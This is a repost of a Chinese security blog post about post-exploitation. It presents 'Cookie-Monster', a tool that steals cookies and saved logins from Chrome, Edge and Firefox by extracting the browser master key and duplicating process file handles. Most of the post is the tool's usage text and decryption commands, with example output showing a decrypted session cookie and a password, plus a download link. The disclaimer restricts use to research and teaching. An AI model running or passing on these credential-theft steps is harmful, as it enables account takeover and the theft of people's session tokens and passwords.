后渗透 - Dump cookie

admin
admin
admin
138880
文章
114
评论
2024年4月23日01:52:52评论15 views字数 2373阅读7分54秒阅读模式

后渗透 - Dump cookie

通过 BOF 或 exe 窃取 Edge、Chrome 和 Firefox 的浏览器 Cookie!Cookie-Monster 将提取 WebKit 主密钥,找到具有 Cookie 和登录数据文件句柄的浏览器进程,复制句柄,然后以无文件方式下载目标。

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] cookie-monster Example:    cookie-monster --chrome    cookie-monster --edge    cookie-moster --firefox    cookie-monster --chromeCookiePID 1337   cookie-monster --chromeLoginDataPID 1337   cookie-monster --edgeCookiePID 4444   cookie-monster --edgeLoginDataPID 4444cookie-monster Options:     --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD     --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD     --firefox, looks for profiles.ini and locates the key4.db and logins.json file     --chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file      --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE使用

Cookie Monster Example:  cookie-monster.exe --all Cookie Monster Options:  -h, --help                     Show this help message and exit  --all                          Run chrome, edge, and firefox methods  --edge                         Extract edge keys and download Cookies/Login Data file to PWD  --chrome                       Extract chrome keys and download Cookies/Login Data file to PWD  --firefox                      Locate firefox key and Cookies, does not make a copy of either file

解密步骤

安装要求

pip3 install -r requirements.txt

Base64 编码 webkit 主密钥

python3 base64-encode.py "xecxfc...."

解密 Chrome/Edge Cookie 文件

python .decrypt.py "XHh..." --cookies ChromeCookie.dbResults Example:-----------------------------------Host: .github.comPath: /Name: dotcom_userCookie: KingOfTheNOPsExpires: Oct 28 2024 21:25:22Host: github.comPath: /Name: user_sessionCookie: x123.....Expires: Nov 11 2023 21:25:22

解密 Chome/Edge 密码文件

python .decrypt.py "XHh..." --passwords ChromePasswords.dbResults Example:-----------------------------------URL: https://test.com/Username: testerPassword: McTesty

解密 Firefox Cookie 和存储的凭据:
https://github.com/lclevy/firepwd

工具地址

https://pan.quark.cn/s/f8bd6ee0786c

原文始发于微信公众号(TtTeam):后渗透 - Dump cookie

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月23日01:52:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   后渗透 - Dump cookiehttps://cn-sec.com/archives/2679144.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息